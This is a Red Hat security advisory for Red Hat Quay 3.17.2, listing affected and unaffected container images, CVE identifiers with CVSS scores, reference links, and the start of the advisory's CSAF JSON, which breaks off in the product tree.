Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Important

CVE-2026-42044

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

References

171 references

URL	Category
https://access.redhat.com/errata/RHSA-2026:22465	self
https://access.redhat.com/security/cve/CVE-2025-62718	external
https://access.redhat.com/security/cve/CVE-2026-27459	external
https://access.redhat.com/security/cve/CVE-2026-29063	external
https://access.redhat.com/security/cve/CVE-2026-29074	external
https://access.redhat.com/security/cve/CVE-2026-32280	external
https://access.redhat.com/security/cve/CVE-2026-32281	external
https://access.redhat.com/security/cve/CVE-2026-32282	external
https://access.redhat.com/security/cve/CVE-2026-32286	external
https://access.redhat.com/security/cve/CVE-2026-32589	external
https://access.redhat.com/security/cve/CVE-2026-32590	external
https://access.redhat.com/security/cve/CVE-2026-33186	external
https://access.redhat.com/security/cve/CVE-2026-33747	external
https://access.redhat.com/security/cve/CVE-2026-33894	external
https://access.redhat.com/security/cve/CVE-2026-34986	external
https://access.redhat.com/security/cve/CVE-2026-39892	external
https://access.redhat.com/security/cve/CVE-2026-40192	external
https://access.redhat.com/security/cve/CVE-2026-40895	external
https://access.redhat.com/security/cve/CVE-2026-42033	external
https://access.redhat.com/security/cve/CVE-2026-42035	external
https://access.redhat.com/security/cve/CVE-2026-42039	external
https://access.redhat.com/security/cve/CVE-2026-42041	external
https://access.redhat.com/security/cve/CVE-2026-42043	external
https://access.redhat.com/security/cve/CVE-2026-42044	external
https://access.redhat.com/security/cve/CVE-2026-4427	external
https://access.redhat.com/security/updates/classi…	external
https://security.access.redhat.com/data/csaf/v2/a…	self
https://access.redhat.com/security/cve/CVE-2025-62718	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456913	external
https://www.cve.org/CVERecord?id=CVE-2025-62718	external
https://nvd.nist.gov/vuln/detail/CVE-2025-62718	external
https://datatracker.ietf.org/doc/html/rfc1034#sec…	external
https://datatracker.ietf.org/doc/html/rfc3986#sec…	external
https://github.com/axios/axios/commit/fb3befb6daa…	external
https://github.com/axios/axios/pull/10661	external
https://github.com/axios/axios/releases/tag/v1.15.0	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-4427	self
https://www.cve.org/CVERecord?id=CVE-2026-4427	external
https://access.redhat.com/security/cve/CVE-2026-27459	self
https://bugzilla.redhat.com/show_bug.cgi?id=2448503	external
https://www.cve.org/CVERecord?id=CVE-2026-27459	external
https://nvd.nist.gov/vuln/detail/CVE-2026-27459	external
https://github.com/pyca/pyopenssl/blob/358cbf29c4…	external
https://github.com/pyca/pyopenssl/commit/57f09bb4…	external
https://github.com/pyca/pyopenssl/security/adviso…	external
https://access.redhat.com/security/cve/CVE-2026-29063	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445291	external
https://www.cve.org/CVERecord?id=CVE-2026-29063	external
https://nvd.nist.gov/vuln/detail/CVE-2026-29063	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/secu…	external
https://access.redhat.com/security/cve/CVE-2026-29074	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445132	external
https://www.cve.org/CVERecord?id=CVE-2026-29074	external
https://nvd.nist.gov/vuln/detail/CVE-2026-29074	external
https://github.com/svg/svgo/security/advisories/G…	external
https://access.redhat.com/security/cve/CVE-2026-32280	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456339	external
https://www.cve.org/CVERecord?id=CVE-2026-32280	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32280	external
https://go.dev/cl/758320	external
https://go.dev/issue/78282	external
https://groups.google.com/g/golang-announce/c/0uY…	external
https://pkg.go.dev/vuln/GO-2026-4947	external
https://access.redhat.com/security/cve/CVE-2026-32281	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456333	external
https://www.cve.org/CVERecord?id=CVE-2026-32281	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32281	external
https://go.dev/cl/758061	external
https://go.dev/issue/78281	external
https://pkg.go.dev/vuln/GO-2026-4946	external
https://access.redhat.com/security/cve/CVE-2026-32282	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456336	external
https://www.cve.org/CVERecord?id=CVE-2026-32282	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32282	external
https://go.dev/cl/763761	external
https://go.dev/issue/78293	external
https://pkg.go.dev/vuln/GO-2026-4864	external
https://access.redhat.com/security/cve/CVE-2026-32286	self
https://bugzilla.redhat.com/show_bug.cgi?id=2451847	external
https://www.cve.org/CVERecord?id=CVE-2026-32286	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32286	external
https://github.com/golang/vulndb/issues/4518	external
https://github.com/jackc/pgx/issues/2507	external
https://pkg.go.dev/vuln/GO-2026-4518	external
https://access.redhat.com/security/cve/CVE-2026-32589	self
https://bugzilla.redhat.com/show_bug.cgi?id=2446963	external
https://www.cve.org/CVERecord?id=CVE-2026-32589	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32589	external
https://access.redhat.com/security/cve/CVE-2026-32590	self
https://bugzilla.redhat.com/show_bug.cgi?id=2446964	external
https://www.cve.org/CVERecord?id=CVE-2026-32590	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32590	external
https://access.redhat.com/security/cve/CVE-2026-33186	self
https://bugzilla.redhat.com/show_bug.cgi?id=2449833	external
https://www.cve.org/CVERecord?id=CVE-2026-33186	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33186	external
https://github.com/grpc/grpc-go/security/advisori…	external
https://access.redhat.com/security/cve/CVE-2026-33747	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452076	external
https://www.cve.org/CVERecord?id=CVE-2026-33747	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33747	external
https://github.com/moby/buildkit/releases/tag/v0.28.1	external
https://github.com/moby/buildkit/security/advisor…	external
https://access.redhat.com/security/cve/CVE-2026-33894	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452464	external
https://www.cve.org/CVERecord?id=CVE-2026-33894	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33894	external
https://datatracker.ietf.org/doc/html/rfc2313#section-8	external
https://github.com/digitalbazaar/forge/security/a…	external
https://mailarchive.ietf.org/arch/msg/openpgp/5rn…	external
https://www.rfc-editor.org/rfc/rfc8017.html	external
https://access.redhat.com/security/cve/CVE-2026-34986	self
https://bugzilla.redhat.com/show_bug.cgi?id=2455470	external
https://www.cve.org/CVERecord?id=CVE-2026-34986	external
https://nvd.nist.gov/vuln/detail/CVE-2026-34986	external
https://github.com/go-jose/go-jose/security/advis…	external
https://pkg.go.dev/github.com/go-jose/go-jose/v4#…	external
https://access.redhat.com/security/cve/CVE-2026-39892	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456735	external
https://www.cve.org/CVERecord?id=CVE-2026-39892	external
https://nvd.nist.gov/vuln/detail/CVE-2026-39892	external
http://www.openwall.com/lists/oss-security/2026/0…	external
https://github.com/pyca/cryptography/commit/622d6…	external
https://github.com/pyca/cryptography/security/adv…	external
https://access.redhat.com/security/cve/CVE-2026-40192	self
https://bugzilla.redhat.com/show_bug.cgi?id=2458856	external
https://www.cve.org/CVERecord?id=CVE-2026-40192	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40192	external
https://github.com/python-pillow/Pillow/commit/3c…	external
https://github.com/python-pillow/Pillow/pull/9521	external
https://github.com/python-pillow/Pillow/security/…	external
https://pillow.readthedocs.io/en/stable/releaseno…	external
https://access.redhat.com/security/cve/CVE-2026-40895	self
https://bugzilla.redhat.com/show_bug.cgi?id=2460297	external
https://www.cve.org/CVERecord?id=CVE-2026-40895	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40895	external
https://github.com/follow-redirects/follow-redire…	external
https://access.redhat.com/security/cve/CVE-2026-42033	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461607	external
https://www.cve.org/CVERecord?id=CVE-2026-42033	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42033	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42035	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461606	external
https://www.cve.org/CVERecord?id=CVE-2026-42035	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42035	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42039	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461630	external
https://www.cve.org/CVERecord?id=CVE-2026-42039	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42039	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42041	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461629	external
https://www.cve.org/CVERecord?id=CVE-2026-42041	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42041	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42043	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461626	external
https://www.cve.org/CVERecord?id=CVE-2026-42043	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42043	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42044	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461624	external
https://www.cve.org/CVERecord?id=CVE-2026-42044	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42044	external
https://github.com/axios/axios/security/advisorie…	external

Acknowledgments

Antony Di Scala Michael Whale

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Red Hat Quay 3.17.2 is now available with bug fixes.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "Quay 3.17.2",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2026:22465",
        "url": "https://access.redhat.com/errata/RHSA-2026:22465"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-62718",
        "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-27459",
        "url": "https://access.redhat.com/security/cve/CVE-2026-27459"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-29063",
        "url": "https://access.redhat.com/security/cve/CVE-2026-29063"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-29074",
        "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32280",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32280"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32281",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32281"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32282",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32286",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32286"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32589",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32589"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32590",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32590"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33186"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33747",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33747"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33894",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-34986",
        "url": "https://access.redhat.com/security/cve/CVE-2026-34986"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-39892",
        "url": "https://access.redhat.com/security/cve/CVE-2026-39892"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40192",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40192"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40895",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42033",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42035",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42039",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42041",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42043",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42044",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4427",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4427"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/",
        "url": "https://access.redhat.com/security/updates/classification/"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_22465.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat Quay 3.17.2",
    "tracking": {
      "current_release_date": "2026-06-30T15:25:23+00:00",
      "generator": {
        "date": "2026-06-30T15:25:23+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "5.3.1"
        }
      },
      "id": "RHSA-2026:22465",
      "initial_release_date": "2026-06-02T13:10:36+00:00",
      "revision_history": [
        {
          "date": "2026-06-02T13:10:36+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2026-06-02T13:10:41+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-06-30T15:25:23+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat Quay 3.17",
                "product": {
                  "name": "Red Hat Quay 3.17",
                  "product_id": "Red Hat Quay 3.17",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:quay:3.17::el9"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat Quay"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-bundle\u0026tag=1778601504"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3A0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel9\u0026tag=1778599991"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-bundle\u0026tag=1778601553"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel9\u0026tag=1778599998"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1778600428"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel9@sha256%3Ae2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel9\u0026tag=1778599977"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
                "product": {
